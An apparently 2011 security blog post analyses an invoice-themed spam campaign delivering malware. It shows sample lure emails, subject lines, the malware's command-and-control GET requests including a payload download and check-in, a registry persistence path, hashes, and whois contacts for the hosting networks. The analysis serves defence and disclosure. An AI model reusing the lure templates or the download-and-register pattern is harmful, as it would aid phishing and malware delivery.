Wednesday, August 10, 2011

Inter-company Invoice spam leads to Malware

This morning we are seeing a new spam campaign in the UAB Spam Data Mine. Volumes are still low, but the count is rising steadily, and the detection so far is horrible. When I started writing this post we had seen 710 copies. It's now up to 1389 copies and counting!

count | mbox
1 | 2011-08-10 05:45:00
6 | 2011-08-10 06:00:00
3 | 2011-08-10 06:15:00
85 | 2011-08-10 06:30:00
1 | 2011-08-10 06:45:00
3 | 2011-08-10 07:00:00
1 | 2011-08-10 07:15:00
301 | 2011-08-10 07:30:00
252 | 2011-08-10 07:45:00
260 | 2011-08-10 08:00:00
247 | 2011-08-10 08:15:00
229 | 2011-08-10 08:30:00
(12 rows)

The spam pretends to be an invoice from a random company. So far this morning we've seen spam claiming to be an invoice from:

Aleris International Corp.
AMR Corporation Corp.
Anic Corp.
Arch Coal Corp.
Beazer Homes USA Corp.
Boyd Gaming Corp.
Brookdale Senior Living Corp.
Hyland Software Corp.
KPMG Corp.
Kraft Foods Corp.
Miltek Corp.
Novellus Systems Corp.
OSN Corp.
PDC Corp.
Safeco Corporation Corp.
WLC Corp.

Subject can be:

Re: Fw: Inter-company inv. from (company)
Re: Fw: Inter-company inv. from (company)
Re: Fw: Inter-company invoice from (company)
Re: Fw: Intercompany invoice from (company)
Re: Fw: Corp. invoice from (company)

A couple example emails follow:

Attached the inter-company inv. for the period January 2010 til December 2010.

Thanks a lot for support setting up this process.

CHERYL Flowers
Kraft Foods Corp.


Attached the inter-company inv. for the period January 2010 til December 2010.
Thanks a lot

Anic Corp.

Good day

Attached the intercompany invoice for the period January 2010 til December 2010.

Thanks a lot for supporting this process
Aleris International Corp.

The attachment may be named "Intinvoice" or "Invoice" followed by an underscore, a date, and an "invoice number" ".zip" such as:

We've seen 1300+ copies so far in the UAB Spam Data Mine, and I have 15 in my personal email.

So far, all have had the same attachment MD5, which yields a 6 of 43 detection rate on this VirusTotal Report.

So far everyone is just saying it is "Suspicious" or "Generic" ... which is our invitation to infect ourselves and figure out what it does!

When we launched the malware, we made a connection to "" on

We also talked to "" on
and to "" on

The connection to did:

GET /forum/dl/ots.php?seller=4&hash={8FA33B0C-3F04-405B-83BD-1CD82D298FF2}

which seems to be uniquely registering our machine, and giving seller #4 credit for my infection?

From we fetched a file:

GET /dump/light.exe

which dropped an approximately 70k file onto our local machine.

Then we went back to and sent another get:

GET /forum/dl/getruns.php?seller=4&hash={8FA33B0C-3F04-405B-83BD-1CD82D298FF2}&ahash=5895b2509324d6a17b2b6ea09859a485

Any bets on whether that ahash is the MD5 of the file I just downloaded?

Looks like I just reported back to the C&C that I successfully downloaded and installed malware with that MD5.

At this point I checked my registry and found that I had a new Run command for next time I restart. I'm supposed to run:

C:\Documents and Settings\Administrator\Application Data\3B1F8DC4\3B1F8DC4.EXE

Odd, I don't recall having a file named that?

Actually, we confirmed that this is the file that was downloaded as "light.exe" above. The VirusTotal report shows only 4 of 43 infection reports for this file as well. See VirusTotal Report.

Unfortunately, it disproves my MD5 theory. This is NOT the "ahash" value. This file's MD5 is f58d5cbb564069eca8806d4e48d7a714.

Launching the second file caused the machine to open an SSL tunnel to and then sit idle.

You may recognize that as the IP address for "" earlier, but it didn't make a connection by name. It went straight for the IP address. If that IP sounds familiar, it's probably because there have been many other malware campaigns tied to the network "Azerbaijan Baku Sol Ltd", but I'm sure that's just because it's a very large network. is currently hosting three live Zeus C&C servers. Surely a coincidence.

I'll email the owner and get those taken down right away! (smirk)


person: Vugar Kouliyev
address: 44, J.Jabbarli str., Baku, Azerbaijan
mnt-by: MNT-SOL
phone: +994124971234
nic-hdl: VK1161-RIPE
source: RIPE # Filtered

descr: SOL ISP
origin: AS43637
mnt-by: MNT-SOL
source: RIPE # Filtered

descr: SOL ISP
origin: AS43637
mnt-by: MNT-SOL
source: RIPE # Filtered

---------------- on also has a sordid history.

That IP address, in Hungary, has been associated with at least two active SpyEye domains: and

I suppose we'll have to ask Mr. Zsolt nicely if he would remove those domains.

person: Zemancsik Zsolt
address: Victor Hugo u. 18-22.
address: 1132 Budapest
address: Hungary
phone: +36 203609059
nic-hdl: DARW-RIPE
mnt-by: DARW-MNT
source: RIPE # Filtered

descr: Originated from 23VNet Network
origin: AS30836
mnt-by: NET23-MNT
source: RIPE # Filtered

======== is on servers from, a customer of Volia DC

person: Volia DC Admin contact
address: Ukraine, Kiev, Kikvidze st. 1/2
phone: +38 044 2852716
nic-hdl: VDCA-RIPE
mnt-by: VOLIA-DC-MNT
source: RIPE # Filtered

descr: Volia more specific route
origin: AS25229
mnt-by: VOLIA-MNT
mnt-lower: VOLIA-MNT
source: RIPE # Filtered

No comments:

Post a Comment

Trying a new setting. After turning on comments, I got about 20-30 comments per day that were all link spam. Sorry to require login, but the spam was too much.